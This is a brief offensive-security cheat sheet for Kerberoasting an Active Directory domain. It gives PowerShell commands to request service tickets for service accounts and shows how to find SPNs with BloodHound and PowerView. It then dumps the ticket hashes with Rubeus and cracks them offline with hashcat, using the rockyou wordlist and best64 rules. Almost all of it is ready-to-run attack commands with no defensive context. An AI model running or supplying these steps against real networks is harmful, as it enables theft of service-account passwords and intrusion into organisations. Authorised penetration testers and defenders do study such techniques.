• Method 1

Type 1) & 2) in powershell or cmd , this will generate requested service ticket

1. Add-Type -AssemblyName System.IdentityModel
2. New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList “<SPN>” to get SPN, go to bloodhound>select service account>node info>spn Or with PowerView  with the command Get-NetUser -username "svc_tgs" -SPN | select samaccountname, primarygroupid, serviceprincipalname

• .\\Rubeus.exe kerberoast /outfile:hashes.kerberoast
• sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force